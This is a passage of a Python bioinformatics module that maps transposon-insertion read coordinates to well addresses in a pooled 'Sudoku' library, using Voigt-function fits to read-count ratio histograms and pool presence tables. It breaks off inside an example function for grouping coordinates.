nColPoolAxisEntries = len(addresses_c[0])
nPRPoolAxisEntries = len(addresses_pr[0])
nPCPoolAxisEntries = len(addresses_pc[0])
poolAxisEntries = [nRowPoolAxisEntries, nColPoolAxisEntries, nPRPoolAxisEntries, \
nPCPoolAxisEntries]
maxEntriesInSingleAddressPoolAxis = max(poolAxisEntries)
return maxEntriesInSingleAddressPoolAxis
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
# Functions for calculating a Voigt function to a read ratio histogram
def voigtFunction(x, p):
from scipy.special import erfc
from numpy import exp
from numpy import sqrt
from numpy import pi, float64
a = p[0]
c = p[1]
delta = p[2]
sigma = p[3]
firstArg = ((-1.j)*(-c + x) + delta)/(sqrt(2)*sigma)
secondArg = ((1.j)*(-c + x) + delta)/(sqrt(2)*sigma)
voigtEquation = a\
*(exp(firstArg**2)*erfc(firstArg) \
+ exp(secondArg**2)*erfc(secondArg) ) \
/ (2*sqrt(2*pi)*sigma)
voigtEquation = float64(voigtEquation)
return voigtEquation
def voigtResiduals(p, y, x):
err = y - voigtFunction(x,p)
return err
def voigtFit(x,y, p0):
import scipy
from scipy.optimize import leastsq
plsq = leastsq(voigtResiduals, p0, args=(y, x), maxfev=2000)
return [plsq[0], voigtFunction(x, plsq[0])]
# ------------------------------------------------------------------------------------------------ #
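# ------------------------------------------------------------------------------------------------ #
# Illustrative sketch (not part of the original module): fitting the Voigt profile to a histogram
# of log read-count ratios. The synthetic data, bin count and the initial parameter guess
# p0 = [amplitude, center, delta, sigma] are assumptions made for the example.
def _exampleVoigtFitUsage():
    from numpy import histogram
    from numpy.random import normal
    logRatios = normal(0.0, 0.5, 5000)
    counts, edges = histogram(logRatios, bins=50)
    binCenters = 0.5*(edges[:-1] + edges[1:])
    p0 = [float(counts.max()), 0.0, 0.1, 0.5]
    plsq, fittedCurve = voigtFit(binCenters, counts, p0)
    return plsq, fittedCurve
# ------------------------------------------------------------------------------------------------ #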
# ------------------------------------------------------------------------------------------------ #
def CalculateVoigtScore(logNRatio, plsq, normalizationFactor):
voigtScore = voigtFunction(logNRatio, plsq)/normalizationFactor
return voigtScore
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculatePossibleAddresses2(addresses_r, addresses_c, addresses_pr, addresses_pc, plsqDict, \
normalizationFactorDict):
# Calculate the possible library addresses that a read alignment coord maps to.
# Same as CalculatePossibleAddresses, except that the reported score is built from Voigt-function
# scores of the log read-count ratios between the pool axis entries.
import numpy
import pdb
possibleAddressesAndScores = []
for address_r in addresses_r:
for address_c in addresses_c:
for address_pr in addresses_pr:
for address_pc in addresses_pc:
row = address_r[0]
col = address_c[0]
pr = address_pr[0]
pc = address_pc[0]
possibleAddress = row + '_' + col + '_' + pr + '_' + pc
nRowReads = address_r[1]
nColReads = address_c[1]
nPRReads = address_pr[1]
nPCReads = address_pc[1]
totalReads = nRowReads + nColReads + nPRReads + nPCReads
nr2nc = nRowReads/nColReads
nr2npr = nRowReads/nPRReads
nr2npc = nRowReads/nPCReads
nc2npr = nColReads/nPRReads
nc2npc = nColReads/nPCReads
npr2npc = nPRReads/nPCReads
logNr2nc = numpy.log(nr2nc)
logNr2npr = numpy.log(nr2npr)
logNr2npc = numpy.log(nr2npc)
logNc2npr = numpy.log(nc2npr)
logNc2npc = numpy.log(nc2npc)
logNpr2npc = numpy.log(npr2npc)
voigtScoreNr2nc = CalculateVoigtScore(logNr2nc, plsqDict['nr2nc'], \
normalizationFactorDict['nr2nc'])
voigtScoreNr2npr = CalculateVoigtScore(logNr2npr, plsqDict['nr2npr'], \
normalizationFactorDict['nr2npr'])
voigtScoreNr2npc = CalculateVoigtScore(logNr2npc, plsqDict['nr2npc'], \
normalizationFactorDict['nr2npc'])
voigtScoreNc2npr = CalculateVoigtScore(logNc2npr, plsqDict['nc2npr'], \
normalizationFactorDict['nc2npr'])
voigtScoreNc2npc = CalculateVoigtScore(logNc2npc, plsqDict['nc2npc'], \
normalizationFactorDict['nc2npc'])
voigtScoreNpr2npc = CalculateVoigtScore(logNpr2npc, plsqDict['npr2npc'], \
normalizationFactorDict['npr2npc'])
scoreDict = {'nr2nc':voigtScoreNr2nc, 'nr2npr':voigtScoreNr2npr, \
'nr2npc':voigtScoreNr2npc, 'nc2npr':voigtScoreNc2npr, \
'nc2npc':voigtScoreNc2npc, 'npr2npc':voigtScoreNpr2npc}
logReadCountRatioDict = {'logNr2nc':logNr2nc, 'logNr2npr':logNr2npr, \
'logNr2npc':logNr2npc, 'logNc2npr':logNc2npr, 'logNc2npc':logNc2npc, \
'logNpr2npc':logNpr2npc}
score = voigtScoreNr2nc * voigtScoreNr2npr * voigtScoreNr2npc \
* voigtScoreNc2npr * voigtScoreNc2npc * voigtScoreNpr2npc
possibleAddressesAndScores.append([possibleAddress, scoreDict, score, \
totalReads, logReadCountRatioDict])
return possibleAddressesAndScores
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculatePhysicalAddresses(poolPresenceTable, rowPools, colPools, prPools, pcPools, \
threshold=5):
physicalAddressDict = GenerateBlankPhysicalAddressDict(poolPresenceTable)
i = 0
while i < len(poolPresenceTable):
entry = poolPresenceTable[i]
coord = int(poolPresenceTable[i]['readAlignmentCoord'])
addresses_r = FindAddressCoords(poolPresenceTable[i], rowPools, threshold=threshold)
addresses_c = FindAddressCoords(poolPresenceTable[i], colPools, threshold=threshold)
addresses_pr = FindAddressCoords(poolPresenceTable[i], prPools, threshold=threshold)
addresses_pc = FindAddressCoords(poolPresenceTable[i], pcPools, threshold=threshold)
possibleAddresses = CalculatePossibleAddresses(addresses_r, addresses_c, addresses_pr, \
addresses_pc)
physicalAddressDict[coord] = possibleAddresses
i += 1
return physicalAddressDict
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculatePhysicalAddressCoordsForLine(poolPresenceTableLine, rowPools, colPools, prPools, \
pcPools, threshold=5):
addresses_r = FindAddressCoords2(poolPresenceTableLine, rowPools, threshold=threshold)
addresses_c = FindAddressCoords2(poolPresenceTableLine, colPools, threshold=threshold)
addresses_pr = FindAddressCoords2(poolPresenceTableLine, prPools, threshold=threshold)
addresses_pc = FindAddressCoords2(poolPresenceTableLine, pcPools, threshold=threshold)
# Each addresses_* entry is in the FindAddressCoords2 format: a list of pool names above
# threshold and a dict mapping each of those pool names to its read count.
return [addresses_r, addresses_c, addresses_pr, addresses_pc]
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculateAverageReadAlignmentCoordinate(group, rowPools, colPools, prPools, pcPools, \
averagingType='median'):
import numpy
from pdb import set_trace
import scipy.stats
# Calculate the median and mean read alignment coordinate
[readAlignmentCoords, totalReads] = \
GenerateHistogramOfReadsVersusReadAlignmentCoord(group, rowPools, colPools, prPools, pcPools)
readAlignmentCoordList = []
i = 0
while i < len(totalReads):
j = 0
while j < totalReads[i]:
readAlignmentCoordList.append(readAlignmentCoords[i])
j += 1
i += 1
# set_trace()
# print(str(readAlignmentCoordList))
if len(readAlignmentCoordList) == 0:
averageReadAlignmentCoord = 0
includeInSummedTable = False
elif averagingType == 'median':
averageReadAlignmentCoord = int(numpy.median(readAlignmentCoordList))
includeInSummedTable = True
elif averagingType == 'mode':
# scipy.stats.mode returns a (mode, count) result; take the modal value before converting to int
averageReadAlignmentCoord = int(scipy.stats.mode(readAlignmentCoordList).mode)
includeInSummedTable = True
elif averagingType == 'mean':
averageReadAlignmentCoord = int(numpy.mean(readAlignmentCoordList))
includeInSummedTable = True
else:
averageReadAlignmentCoord = int(numpy.median(readAlignmentCoordList))
includeInSummedTable = True
return [averageReadAlignmentCoord, includeInSummedTable]
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def GenerateHistogramOfReadsVersusReadAlignmentCoord(groupedPoolPresenceTableGroup, \
rowPools, colPools, prPools, pcPools):
i = 0
readAlignmentCoords = []
totalReads = []
while i < len(groupedPoolPresenceTableGroup):
readAlignmentCoord = groupedPoolPresenceTableGroup[i]['readAlignmentCoord']
readAlignmentCoords.append(readAlignmentCoord)
readCount = \
CountReadsAssociatedWithCoordinateThatAreInLocationPools(groupedPoolPresenceTableGroup[i],\
rowPools, colPools, prPools, pcPools)
totalReads.append(readCount)
i += 1
return [readAlignmentCoords, totalReads]
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CountReadsAssociatedWithCoordinateThatAreInLocationPools(groupedPoolPresenceTableGroupLine,\
rowPools, colPools, prPools, pcPools):
totalReads = 0
i = 0
while i < len(rowPools):
totalReads += groupedPoolPresenceTableGroupLine[rowPools[i]]
i += 1
i = 0
while i < len(colPools):
totalReads += groupedPoolPresenceTableGroupLine[colPools[i]]
i += 1
i = 0
while i < len(prPools):
totalReads += groupedPoolPresenceTableGroupLine[prPools[i]]
i += 1
i = 0
while i < len(pcPools):
totalReads += groupedPoolPresenceTableGroupLine[pcPools[i]]
i += 1
return totalReads
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CountReadsAssociatedWithLineBooleanOperation(axisCoordIntersections, nextLineCoords, \
currentLineCoords):
readsCount = 0
for coord in axisCoordIntersections:
if coord in nextLineCoords[0]:
readsCount += nextLineCoords[1][coord]
if coord in currentLineCoords[0]:
readsCount += currentLineCoords[1][coord]
return readsCount
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculateTotalReadsInLine(poolPresenceTableLine, rowPools, colPools, prPools, pcPools, \
controlPools):
i = 0
totalReads = 0
while i < len(rowPools):
totalReads += poolPresenceTableLine[rowPools[i]]
i +=1
i = 0
while i < len(colPools):
totalReads += poolPresenceTableLine[colPools[i]]
i +=1
i = 0
while i < len(prPools):
totalReads += poolPresenceTableLine[prPools[i]]
i +=1
i = 0
while i < len(pcPools):
totalReads += poolPresenceTableLine[pcPools[i]]
i +=1
if controlPools != None:
i = 0
while i < len(controlPools):
totalReads += poolPresenceTableLine[controlPools[i]]
i +=1
return totalReads
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculatePoolPresenceTableTaxonomyDict(poolPresenceTable, rowPools, colPools, prPools, \
pcPools, controlPools, threshold):
keysInPrintOrder = [\
'totalLines',\
'linesThatMapToLibraryAddresses',\
'linesThatMapToSingleLibraryAddresses',\
'linesThatMapToMultipleLibraryAddresses',\
'linesThatMapToUnambiguousLibraryAddresses',\
'linesThatMapToAmbiguousLibraryAddresses', \
'linesThatDoNotMapToLibraryAddresses',\
'linesThatHaveNoReadsAboveThresholdInAnyPool',\
'linesThatMapToControlIndexesOnly',\
'linesThatHaveCoordinatesInNoPoolAxis',\
'linesThatHaveCoordinatesInOnlyOnePoolAxis',\
'linesThatHaveCoordinatesInOnlyTwoPoolAxes',\
'linesThatHaveCoordinatesInOnlyThreePoolAxes',\
'totalReads']
# Define the pool presence line taxonomy dict
poolPresenceTableTaxonomyDict = {}
for key in keysInPrintOrder:
poolPresenceTableTaxonomyDict[key] = 0
poolPresenceTablePoolsCoordsList = {}
possibleAddressesDict = {}
numberPoolAxesWithEntriesForLine = {}
numberPoolAxesWithMoreThanOneEntry = {}
i = 0
while i < len(poolPresenceTable):
readsInLine = CalculateTotalReadsInLine(poolPresenceTable[i], \
rowPools, colPools, prPools, pcPools, controlPools)
poolPresenceTableTaxonomyDict['totalReads'] += readsInLine
coord = int(poolPresenceTable[i]['readAlignmentCoord'])
poolPresenceTableTaxonomyDict['totalLines'] += 1
possibleAddresses = CalculateLibraryAddressesForPoolPresenceTableLine(\
poolPresenceTable[i], rowPools, colPools, prPools, pcPools, threshold=threshold)
lenPossibleAddresses = len(possibleAddresses)
[addresses_r, addresses_c, addresses_pr, addresses_pc, addresses_control] = \
CalculatePoolCoordsForLine(\
poolPresenceTable[i], rowPools, colPools, prPools, pcPools, controlPools, threshold=threshold)
poolCoordsForLine = [addresses_r, addresses_c, addresses_pr, addresses_pc, addresses_control]
[nAddressPoolAxesWithEntries, nControlPoolsWithEntries] = \
CalculateNumberOfPoolAxesThatHaveEntries(addresses_r, addresses_c, addresses_pr, addresses_pc, \
addresses_control)
# Determine whether the library address calculation will be ambiguous by counting the number of
# pool axes with more than one entry. A single axis with multiple entries is fine (all of its
# possible coords can be filled), but more than one such axis leads to ambiguous cross terms.
nAddressPoolAxesWithMoreThanOneEntry = \
CalculateNumberOfPoolAxesThatHaveMoreThanOneEntry(addresses_r, addresses_c, addresses_pr, \
addresses_pc, addresses_control)
if (nAddressPoolAxesWithEntries == 0) and (nControlPoolsWithEntries == 0):
poolPresenceTableTaxonomyDict['linesThatHaveNoReadsAboveThresholdInAnyPool'] += 1
if lenPossibleAddresses != 0:
print(str(coord))
if (nAddressPoolAxesWithEntries == 0) and (nControlPoolsWithEntries > 0):
poolPresenceTableTaxonomyDict['linesThatMapToControlIndexesOnly'] += 1
if lenPossibleAddresses != 0:
print(str(coord))
if (nAddressPoolAxesWithEntries == 1):
poolPresenceTableTaxonomyDict['linesThatHaveCoordinatesInOnlyOnePoolAxis'] += 1
if lenPossibleAddresses != 0:
print(str(coord))
if (nAddressPoolAxesWithEntries == 2):
poolPresenceTableTaxonomyDict['linesThatHaveCoordinatesInOnlyTwoPoolAxes'] += 1
if lenPossibleAddresses != 0:
print(str(coord))
if (nAddressPoolAxesWithEntries == 3):
poolPresenceTableTaxonomyDict['linesThatHaveCoordinatesInOnlyThreePoolAxes'] += 1
if lenPossibleAddresses != 0:
print(str(coord))
if (nAddressPoolAxesWithEntries == 0):
poolPresenceTableTaxonomyDict['linesThatHaveCoordinatesInNoPoolAxis'] += 1
if lenPossibleAddresses != 0:
print(str(coord))
if nAddressPoolAxesWithMoreThanOneEntry > 1 and lenPossibleAddresses >= 1:
poolPresenceTableTaxonomyDict['linesThatMapToAmbiguousLibraryAddresses'] += 1
if nAddressPoolAxesWithMoreThanOneEntry <= 1 and lenPossibleAddresses >= 1:
poolPresenceTableTaxonomyDict['linesThatMapToUnambiguousLibraryAddresses'] += 1
if lenPossibleAddresses == 0:
poolPresenceTableTaxonomyDict['linesThatDoNotMapToLibraryAddresses'] += 1
elif lenPossibleAddresses == 1:
poolPresenceTableTaxonomyDict['linesThatMapToSingleLibraryAddresses'] += 1
poolPresenceTableTaxonomyDict['linesThatMapToLibraryAddresses'] += 1
elif lenPossibleAddresses > 1:
poolPresenceTableTaxonomyDict['linesThatMapToMultipleLibraryAddresses'] += 1
poolPresenceTableTaxonomyDict['linesThatMapToLibraryAddresses'] += 1
i += 1
PrintPoolPresenceTableTaxonomyDict(threshold, poolPresenceTableTaxonomyDict, keysInPrintOrder)
return poolPresenceTableTaxonomyDict
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def PrintPoolPresenceTableTaxonomyDict(threshold, poolPresenceTableTaxonomyDict, keysInPrintOrder):
outputStr = ''
outputStr += 'threshold: ' + str(threshold) + '\n'
for key in keysInPrintOrder:
outputStr += key + ': ' + str(poolPresenceTableTaxonomyDict[key]) + '\n'
print(outputStr)
return
# ------------------------------------------------------------------------------------------------ #
####################################################################################################
# ------------------------------------------------------------------------------------------------ #
# Step 6: Functions for initially populating the pool presence table
# ------------------------------------------------------------------------------------------------ #
####################################################################################################
# ------------------------------------------------------------------------------------------------ #
def GenerateUniqueCoordsList(genomeArray):
from scipy import unique
coords = genomeArray['readAlignmentCoord']
uniqueCoords = unique(coords)
return uniqueCoords
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def GenerateValidCoordsList(genomeArray):
import numpy
from numpy import int32
validCoords = 0
i = 0
maxReadIDLength = 15
while i < len(genomeArray):
coord = genomeArray[i]
# Use the same filter as the population pass below so that validCoords matches the number of
# rows that are actually filled in to validGenomeArray.
if coord['alignmentQuality'] > 1 and coord['alignmentFound'] == 1 \
and coord['multipleAlignmentsFound'] == 0 and coord['himarRecognized'] == 1 \
and coord['index'] > 0 and coord['strangeFlagsSum'] == 0:
validCoords += 1
readIDLength = len(coord[0])
if readIDLength > maxReadIDLength:
maxReadIDLength = readIDLength
i += 1
readIDFieldCode = 'a' + str(maxReadIDLength+2)
validGenomeArray = numpy.zeros(validCoords, \
dtype={'names':['readID', 'readAlignmentCoord', 'alignmentQuality', 'index'], \
'formats':[readIDFieldCode, int32, int32, int32]})
i = 0
j = 0
while i < len(genomeArray) and j < validCoords:
coord = genomeArray[i]
if coord['alignmentQuality'] > 1 and coord['alignmentFound'] == 1 \
and coord['multipleAlignmentsFound'] == 0 and coord['himarRecognized'] == 1 \
and coord['index'] > 0 and coord['strangeFlagsSum'] == 0:
validGenomeArray[j]['readID'] = coord['readID']
validGenomeArray[j]['readAlignmentCoord'] = coord['readAlignmentCoord']
validGenomeArray[j]['alignmentQuality'] = coord['alignmentQuality']
validGenomeArray[j]['index'] = coord['index']
j += 1
i += 1
return validGenomeArray
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def GeneratePoolNameToPoolCodeLookupTable(barcodeFile):
# Builds a lookup table mapping barcode number to pool name from the comma-separated barcode file.
barcodeFileHandle = open(barcodeFile, 'r')
barcodeFileData = barcodeFileHandle.readlines()
barcodeFileHandle.close()
indexLookupTable = {}
for line in barcodeFileData:
if line[0] != '#':
lineData = line.strip().split(',')
poolName = lineData[0]
forwardSeq = lineData[1]
revCompl = lineData[2]
barcodeNumber = lineData[3]
indexLookupTable[str(barcodeNumber)] = poolName
return indexLookupTable
# ------------------------------------------------------------------------------------------------ #
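# ------------------------------------------------------------------------------------------------ #
# Illustrative sketch (not part of the original module): the comma-separated barcode file format
# that GeneratePoolNameToPoolCodeLookupTable expects, checked by writing a temporary file. The pool
# names, sequences and barcode numbers are invented for the example.
def _exampleBarcodeFileParsing():
    import tempfile, os
    exampleLines = [ \
    '# poolName,forwardSeq,reverseComplement,barcodeNumber\n', \
    'row_A,ACGTACGT,ACGTACGT,1\n', \
    'col_01,TTGGCCAA,TTGGCCAA,2\n']
    handle = tempfile.NamedTemporaryFile(mode='w', suffix='.csv', delete=False)
    handle.writelines(exampleLines)
    handle.close()
    indexLookupTable = GeneratePoolNameToPoolCodeLookupTable(handle.name)
    os.remove(handle.name)
    # indexLookupTable == {'1': 'row_A', '2': 'col_01'}
    return indexLookupTable
# ------------------------------------------------------------------------------------------------ #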
# ------------------------------------------------------------------------------------------------ #
def BuildInitialPoolPresenceTable(genomeArray, outputLog, barcodeFile, poolPresenceTableFileName):
import numpy
import pdb
outputStr = gSeparatorString
outputStr += 'Building Initial Pool Presence Table\n'
UpdateLogFileData(outputLog, outputStr)
print(outputStr)
# Compile the valid reads
outputStr = "Making Valid Genome Array\n"
UpdateLogFileData(outputLog, outputStr)
print(outputStr)
validGenomeArray = GenerateValidCoordsList(genomeArray)
validGenomeArray = numpy.sort(validGenomeArray, order='readAlignmentCoord')
# Generate the unique coordinates list
outputStr = "Generating Unique Coordinates List\n"
UpdateLogFileData(outputLog, outputStr)
print(outputStr)
uniqueCoords = GenerateUniqueCoordsList(validGenomeArray)
# Make the first round of the pool presence table
indexLookupTable = GeneratePoolNameToPoolCodeLookupTable(barcodeFile)
dtypeArray = GenerateDTypeArrayForPoolPresenceDict(indexLookupTable)
poolKeys = sorted(indexLookupTable.keys())
poolColumns = ['readAlignmentCoord']
i = 0
while i < len(poolKeys):
poolColumns.append(indexLookupTable[poolKeys[i]])
i += 1
print("Generating Pool Presence Table")
poolPresenceTable = GeneratePoolPresenceTable(uniqueCoords, validGenomeArray, \
indexLookupTable, dtypeArray)
WritePoolPresenceTable3(poolPresenceTableFileName, poolPresenceTable, poolColumns)
return poolPresenceTable
# ------------------------------------------------------------------------------------------------ #
####################################################################################################
# ------------------------------------------------------------------------------------------------ #
# Step 7: Functions for analyzing the pool presence table
# ------------------------------------------------------------------------------------------------ #
####################################################################################################
# ------------------------------------------------------------------------------------------------ #
def CalculateLibraryAddressLocatabilityForPoolPresenceTableLine(poolPresenceTableLine, \
rowPools, colPools, prPools, pcPools, controlPools, fitDict, areaDict, threshold, \
maxEntriesInSingleAddressPoolAxis, maxTotalCoords):
import pdb
[addresses_r, addresses_c, addresses_pr, addresses_pc, addresses_control] = \
CalculatePoolCoordsForLine(\
poolPresenceTableLine, rowPools, colPools, prPools, pcPools, controlPools, \
threshold=threshold)
[nRowCoords, nColCoords, nPRCoords, nPCCoords] = \
CalculateNumberOfEntriesInPoolAxes(addresses_r, addresses_c, \
addresses_pr, addresses_pc)
nTotalCoords = nRowCoords + nColCoords + nPRCoords + nPCCoords
[nAddressPoolAxesWithEntries, nControlPoolsWithEntries] = \
CalculateNumberOfPoolAxesThatHaveEntries(addresses_r, addresses_c, addresses_pr, \
addresses_pc, addresses_control)
nAddressPoolAxesWithMoreThanOneEntry = \
CalculateNumberOfPoolAxesThatHaveMoreThanOneEntry(addresses_r, addresses_c, \
addresses_pr, addresses_pc, addresses_control)
maxSinglePoolCoordNumber = \
CalculateMaxNumberOfEntriesInSinglePoolAxis(addresses_r, addresses_c, \
addresses_pr, addresses_pc)
# Decide on the locatability of the genomic coordinate
if nAddressPoolAxesWithEntries < 3:
locatability = 'unlocatable'
possibleAddressesAndScores = None
elif maxSinglePoolCoordNumber > maxEntriesInSingleAddressPoolAxis or \
nTotalCoords > maxTotalCoords:
locatability = 'unlocatable'
possibleAddressesAndScores = None
elif nAddressPoolAxesWithEntries == 3:
if nAddressPoolAxesWithMoreThanOneEntry > 1:
locatability = 'unlocatable'
possibleAddressesAndScores = None
elif nAddressPoolAxesWithMoreThanOneEntry <= 1:
locatability = 'guessable'
possibleAddressesAndScores = None
elif nAddressPoolAxesWithEntries == 4:
possibleAddressesAndScores = \
CalculateLibraryAddressesForPoolPresenceTableLine2(poolPresenceTableLine, \
rowPools, colPools, prPools, pcPools, fitDict, \
areaDict, threshold)
if len(possibleAddressesAndScores) == 0:
pdb.set_trace()
if nAddressPoolAxesWithMoreThanOneEntry > 1:
locatability = 'ambiguous'
elif nAddressPoolAxesWithMoreThanOneEntry <= 1:
locatability = 'unambiguous'
else:
locatability = 'unlocatable'
possibleAddressesAndScores = None
return [possibleAddressesAndScores, locatability, maxSinglePoolCoordNumber]
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def PopulateSudokuGrid3(sudokuGridLookupDict, poolPresenceTable, rowPools, colPools, \
prPools, pcPools, controlPools, fitDict, areaDict, readCountThreshold, scoreThreshold, \
maxEntriesInSingleAddressPoolAxis, maxTotalCoords):
import pdb
i = 0
while i < len(poolPresenceTable):
poolPresenceTableLine = poolPresenceTable[i]
# pdb.set_trace()
coord = poolPresenceTableLine['readAlignmentCoord']
[possibleAddressesAndScores, locatability, maxSinglePoolCoordNumber] = \
CalculateLibraryAddressLocatabilityForPoolPresenceTableLine(poolPresenceTableLine, \
rowPools, colPools, prPools, pcPools, controlPools, fitDict, areaDict, readCountThreshold, \
maxEntriesInSingleAddressPoolAxis, maxTotalCoords)
# if (coord==5038710) or (coord==5038711) or (coord==5038712):
# pdb.set_trace()
if locatability == 'unambiguous':
AssignUnambiguousAddresses(sudokuGridLookupDict, possibleAddressesAndScores, coord, \
locatability)
elif locatability == 'ambiguous':
AssignAmbiguousAddresses(sudokuGridLookupDict, possibleAddressesAndScores, coord, \
locatability, maxSinglePoolCoordNumber)
elif locatability == 'guessable':
AssignGuessableAddresses(sudokuGridLookupDict, coord, poolPresenceTableLine, \
rowPools, colPools, prPools, pcPools, controlPools, fitDict, areaDict, \
readCountThreshold, maxEntriesInSingleAddressPoolAxis, maxTotalCoords)
i += 1
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def AddAddressToSudokuGrid(coord, locatability, possibleAddressesAndScoresEntry, \
sudokuGridLookupDict):
addressCoords = possibleAddressesAndScoresEntry[0].split('_')
locatabilityScore = possibleAddressesAndScoresEntry[2]
readCount = possibleAddressesAndScoresEntry[3]
row = addressCoords[0]
col = addressCoords[1]
pr = addressCoords[2]
pc = addressCoords[3]
sudokuCoord = SudokuGenomicCoord(coord, locatability, locatabilityScore, readCount)
sudokuGridLookupDict[pr][pc].wellGrid[row][col].readAlignmentCoords.append(sudokuCoord)
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def AssignUnambiguousAddresses(sudokuGridLookupDict, possibleAddressesAndScores, coord, \
locatability):
j = 0
while j < len(possibleAddressesAndScores):
AddAddressToSudokuGrid(coord, locatability, possibleAddressesAndScores[j], \
sudokuGridLookupDict)
j += 1
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def AssignAmbiguousAddresses(sudokuGridLookupDict, possibleAddressesAndScores, coord, \
locatability, maxEntriesInSingleAddressPoolAxis):
import operator
import pdb
sortedPossibleAddressesAndScores = sorted(possibleAddressesAndScores, \
key=operator.itemgetter(2), reverse=True)
# if coord==5038711:
# pdb.set_trace()
j = 0
continueAddingAddressesToSudokuGrid = True
while continueAddingAddressesToSudokuGrid == True:
try:
addressAndScore = sortedPossibleAddressesAndScores[j]
except IndexError:
pdb.set_trace()
AddAddressToSudokuGrid(coord, locatability, addressAndScore, sudokuGridLookupDict)
j += 1
if (j < maxEntriesInSingleAddressPoolAxis) \
and j < len(sortedPossibleAddressesAndScores):
continueAddingAddressesToSudokuGrid = True
else:
continueAddingAddressesToSudokuGrid = False
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def AssignGuessableAddresses(sudokuGridLookupDict, coord, poolPresenceTableLine, \
rowPools, colPools, prPools, pcPools, controlPools, fitDict, areaDict, readCountThreshold, \
maxSinglePoolCoordNumber, maxTotalCoords):
temporaryThreshold = 1
validAddressesFound = False
while validAddressesFound == False and temporaryThreshold <= readCountThreshold:
[possibleAddressesAndScores, locatability, maxSinglePoolCoordNumber] = \
CalculateLibraryAddressLocatabilityForPoolPresenceTableLine(poolPresenceTableLine, \
rowPools, colPools, prPools, pcPools, controlPools, fitDict, areaDict, temporaryThreshold, \
maxSinglePoolCoordNumber, maxTotalCoords)
if locatability == 'unambiguous':
validAddressesFound = True
else:
temporaryThreshold += 1
if validAddressesFound == True:
AssignUnambiguousAddresses(sudokuGridLookupDict, possibleAddressesAndScores, coord, \
'unambiguous')
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def SolvePoolPresenceTable(sudokuGridLookupDict, poolPresenceTable, \
rowPools, colPools, prPools, pcPools, controlPools, logReadNumberRatioHistogramFitDict, \
logReadNumberRatioHistogramIntegralDict, \
readCountThreshold, voigtScoreThreshold, maxSinglePoolCoordNumber, maxTotalCoords, \
maxGapForCoordGrouping):
import pdb
# pdb.set_trace()
PopulateSudokuGrid3(sudokuGridLookupDict, poolPresenceTable, rowPools, colPools, \
prPools, pcPools, controlPools, logReadNumberRatioHistogramFitDict, \
logReadNumberRatioHistogramIntegralDict, readCountThreshold, voigtScoreThreshold, \
maxSinglePoolCoordNumber, maxTotalCoords)
sudokuGridTaxonomyDictPreGrouping = CalculateSudokuGridOccupancyTaxonomy(sudokuGridLookupDict, \
rowPools, colPools, prPools, pcPools)
GroupReadAlignmentCoordsInSudokuGrid(sudokuGridLookupDict, prPools, pcPools, rowPools, \
colPools, maxGap=maxGapForCoordGrouping)
sudokuGridTaxonomyDict = CalculateSudokuGridOccupancyTaxonomy(sudokuGridLookupDict, rowPools, \
colPools, prPools, pcPools)
print('Sudoku Taxonomy Pre-Grouping')
PrintSudokuGridOccupancyTaxonomy(sudokuGridTaxonomyDictPreGrouping)
print('Sudoku Taxonomy Post-Grouping')
PrintSudokuGridOccupancyTaxonomy(sudokuGridTaxonomyDict)
return sudokuGridTaxonomyDict
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def GroupSudokuGenomicCoords(coordArray, maxGap=1):
import pdb
import numpy
import operator
i = 0
expect = None
run = []
result = [run]
currentLineMatchesPrevious = True
while i < len(coordArray):
if currentLineMatchesPrevious:
run.append(coordArray[i])
else:
run = [coordArray[i]]
result.append(run)
currentLineMatchesPrevious = False
if i < len(coordArray) - 1:
currentCoord = coordArray[i].coord
nextCoord = coordArray[i+1].coord
expect = currentCoord + maxGap
if nextCoord <= expect:
currentLineMatchesPrevious = True
i += 1
groupedCoords = []
i = 0
while i < len(result):
if len(result[i]) == 1:
# pdb.set_trace()
groupedCoords.append(result[i][0])
elif len(result[i]) > 1:
coords = sorted(result[i], key=operator.attrgetter('readCount'), reverse=True)
j = 0
readCountList = []
while j < len(coords):
k = 0
while k < coords[j].readCount:
readCountList.append(coords[j].coord)
k += 1
j += 1
representativeCoord = numpy.median(readCountList)
j = 0
totalReadCount = 0
locatabilityArray = []
while j < len(coords):
totalReadCount += coords[j].readCount
locatabilityArray.append(coords[j].locatability)
j +=1
if 'unambiguous' in locatabilityArray:
locatability = 'unambiguous'
elif 'ambiguous' in locatabilityArray:
locatability = 'ambiguous'
elif 'guessable' in locatabilityArray:
locatability = 'guessable'
else:
locatability = 'merged'
locatabilityScore = 'merged'
groupedCoords.append(SudokuGenomicCoord(representativeCoord, locatability, \
locatabilityScore, totalReadCount))
i += 1
return groupedCoords
# ------------------------------------------------------------------------------------------------ #
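# ------------------------------------------------------------------------------------------------ #
# Illustrative sketch (not part of the original module): grouping of nearby read alignment
# coordinates within a well. Coordinates 1000, 1001 and 1002 fall within maxGap of each other, so
# they collapse into one SudokuGenomicCoord whose coordinate is the read-count-weighted median and
# whose read count is the sum; the isolated coordinate 5000 is kept as-is. Inputs are invented.
def _exampleGroupSudokuGenomicCoords():
    coords = [ \
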